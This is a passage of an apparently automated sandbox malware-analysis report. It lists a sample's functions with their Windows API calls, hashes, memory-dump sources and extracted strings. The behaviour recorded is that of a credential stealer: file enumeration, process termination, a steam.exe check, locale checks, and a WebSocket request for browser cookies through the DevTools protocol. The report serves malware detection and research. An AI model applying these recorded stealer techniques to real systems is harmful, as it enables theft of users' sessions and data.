                                  • Part of subcall function 00C8D980: lstrcat.KERNEL32(?,0179D778), ref: 00C8DA5E
                                  • Part of subcall function 00C8D980: lstrcpy.KERNEL32(00000000,?), ref: 00C8DA8E
                                  • Part of subcall function 00C8D980: GetFileAttributesA.KERNEL32(00000000), ref: 00C8DA95
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00C8DE2E
                                • FindClose.KERNEL32(00000000), ref: 00C8DE3D
                                • lstrcat.KERNEL32(?,0179F488), ref: 00C8DE66
                                • lstrcat.KERNEL32(?,0179E030), ref: 00C8DE7A
                                • lstrlen.KERNEL32(?), ref: 00C8DE84
                                • lstrlen.KERNEL32(?), ref: 00C8DE92
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8DED2
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                • String ID: %s\%s$%s\*
                                • API String ID: 4184593125-2848263008
                                • Opcode ID: f675c1fd588d1ae95381dbe58cc29657f2812ca16ee0878fc20f97a9dfbc4e69
                                • Instruction ID: 369389dc77a2c136c3c587d3bfd28d6f46e7d482579ae39e2e84c2890de7ad45
                                • Opcode Fuzzy Hash: f675c1fd588d1ae95381dbe58cc29657f2812ca16ee0878fc20f97a9dfbc4e69
                                • Instruction Fuzzy Hash: 52616375900209AFCB10EF64DD89ADE77B9FF88314F0485A4B50AE7291DB34AA48DB50
                                Function 00C8D530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00C8D54D
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C8D564
                                • StrCmpCA.SHLWAPI(?,00CA17A0), ref: 00C8D584
                                • StrCmpCA.SHLWAPI(?,00CA17A4), ref: 00C8D59E
                                • lstrcat.KERNEL32(?,0179F488), ref: 00C8D5E3
                                • lstrcat.KERNEL32(?,0179F4F8), ref: 00C8D5F7
                                • lstrcat.KERNEL32(?,?), ref: 00C8D60B
                                • lstrcat.KERNEL32(?,?), ref: 00C8D61C
                                • lstrcat.KERNEL32(?,00CA1794), ref: 00C8D62E
                                • lstrcat.KERNEL32(?,?), ref: 00C8D642
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8D682
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8D6D2
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00C8D737
                                • FindClose.KERNEL32(00000000), ref: 00C8D746
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 50252434-4073750446
                                • Opcode ID: 30530722ca3294b10e274e683534041a8bcf4875c46efdeb75105cca5161e196
                                • Instruction ID: 0ebafd3f9ca86725d90b6b1ef85ce5a08bd60500cfe4b492a8235580f36a941a
                                • Opcode Fuzzy Hash: 30530722ca3294b10e274e683534041a8bcf4875c46efdeb75105cca5161e196
                                • Instruction Fuzzy Hash: 9E6162759102199FCB20EF75DC88ADE77B8EF49314F0484A5F65AA3241EB34AB48CF90
                                Function 00C948B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                • API String ID: 909987262-758292691
                                • Opcode ID: f35cda0597ed2082f7e5fbd448d364f5d52e4a12344ba16a165b8c9af0001b67
                                • Instruction ID: de61f8daec3256c0bd1ff6eec267d343751d3ab1404e29ee44ba192517c590d0
                                • Opcode Fuzzy Hash: f35cda0597ed2082f7e5fbd448d364f5d52e4a12344ba16a165b8c9af0001b67
                                • Instruction Fuzzy Hash: 7FA25871D012699FDF24DBA8C884BEDBBB6BF48300F1481AAD519A7241DB705F86DF90
                                Function 00C823A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C823D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C823F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C82402
                                • lstrlen.KERNEL32(\*.*), ref: 00C8240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00C82436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C82486
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 94a73bf33c6dd1d27e40fad9afb5216b056867727f0313c9113e91272b2ad584
                                • Instruction ID: 349c981f40f94f8a8475662fb4942a2d727918eac58d93576d20ce4fe0aba0b5
                                • Opcode Fuzzy Hash: 94a73bf33c6dd1d27e40fad9afb5216b056867727f0313c9113e91272b2ad584
                                • Instruction Fuzzy Hash: DD415E316112198FCB32FF68DD89A9E77E4EF95314F04D134B95EA7212CB30AD05ABA0
                                Function 01017966 Relevance: 14.1, Strings: 10, Instructions: 1642COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: /;3z$497r$@HzZ$J/?$V>7{$Vxn$cFk$k!K$zds$qE~
                                • API String ID: 0-3750487434
                                • Opcode ID: 5d7b0b4fc96bc8871111152462490e0df9b3111acce001ea7d0c5ed0cd9315c6
                                • Instruction ID: 2d9842df28c481f12e36d72306d92774351ef6ed9419e3dd79e914c9b0ea393e
                                • Opcode Fuzzy Hash: 5d7b0b4fc96bc8871111152462490e0df9b3111acce001ea7d0c5ed0cd9315c6
                                • Instruction Fuzzy Hash: CAB2F9F360C2049FE304AE2DEC8567ABBE9EF94720F16493DEAC4C7744EA3558058796
                                Function 00C946A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00C946B9
                                • Process32First.KERNEL32(00000000,00000128), ref: 00C946C9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00C946DB
                                • StrCmpCA.SHLWAPI(?,?), ref: 00C946ED
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C94702
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C94711
                                • CloseHandle.KERNEL32(00000000), ref: 00C94718
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00C94726
                                • CloseHandle.KERNEL32(00000000), ref: 00C94731
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 72d364a2c731b004bb432be79d7ed60891a2352dd91e02ce094dd700027a6893
                                • Instruction ID: 09902b83dc80c60c9c10ef6594f2a2b751f3d6a9f5367e5249f207fc8831d040
                                • Opcode Fuzzy Hash: 72d364a2c731b004bb432be79d7ed60891a2352dd91e02ce094dd700027a6893
                                • Instruction Fuzzy Hash: A301A135601119AFEB205B62AC8CFFB377CAB4EB41F000098F905A5080EF74AA998B60
                                Function 01016079 Relevance: 12.7, Strings: 9, Instructions: 1485COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0i^>$?US$Ad7|$KFJ|$`E:$bd='$fmo$ic[a$zmE
                                • API String ID: 0-3588367883
                                • Opcode ID: 80c830090ef885592898ed3cc8c92715222c5cbf36623775253930842356738d
                                • Instruction ID: b852b9a58368db66381a8c3a559bfa326e92a6c3e81509f73708a47fb73c73f6
                                • Opcode Fuzzy Hash: 80c830090ef885592898ed3cc8c92715222c5cbf36623775253930842356738d
                                • Instruction Fuzzy Hash: 0FA218F360C2009FE7046E2DEC85A7ABBE9EF94720F1A493DE6C5C7744E63598018696
                                Function 00C94610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00C94628
                                • Process32First.KERNEL32(00000000,00000128), ref: 00C94638
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00C9464A
                                • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00C94660
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00C94672
                                • CloseHandle.KERNEL32(00000000), ref: 00C9467D
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                • String ID: steam.exe
                                • API String ID: 2284531361-2826358650
                                • Opcode ID: 1e1ae765b4c410976e7c9736cb8a5d2107543afacd06420d7ee4d730b66bf408
                                • Instruction ID: c45276cf1ed3642fb3abe7f85205afc02bda6db5f263b35e66911bbf1d6f39bc
                                • Opcode Fuzzy Hash: 1e1ae765b4c410976e7c9736cb8a5d2107543afacd06420d7ee4d730b66bf408
                                • Instruction Fuzzy Hash: 16014F716012289FDB209B61AC89FEB77BCEF0E750F0401D5F908E1141EB74AA998AE5
                                Function 00C84B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C84B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C84B7F
                                • lstrlen.KERNEL32(00CA4CA8), ref: 00C84B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84BA7
                                • lstrcat.KERNEL32(00000000,00CA4CA8), ref: 00C84BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00C84BFA
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID:
                                • API String ID: 2567437900-0
                                • Opcode ID: 485ce969d2d871506618eed89035ccb2b9987733b5889965250d0a66e86f6225
                                • Instruction ID: 0317ca0a45d042d5332a533d59ff5ce53de1e19e7c43f1ee802fde909bb94907
                                • Opcode Fuzzy Hash: 485ce969d2d871506618eed89035ccb2b9987733b5889965250d0a66e86f6225
                                • Instruction Fuzzy Hash: D4315E316215169BCB26FF68EC85EAE77F9EF95324F058134F81997212CB30ED05AB90
                                Function 00C92D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C971E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00C971FE
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00C92D9B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C92DAD
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00C92DBA
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00C92DEC
                                • LocalFree.KERNEL32(00000000), ref: 00C92FCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
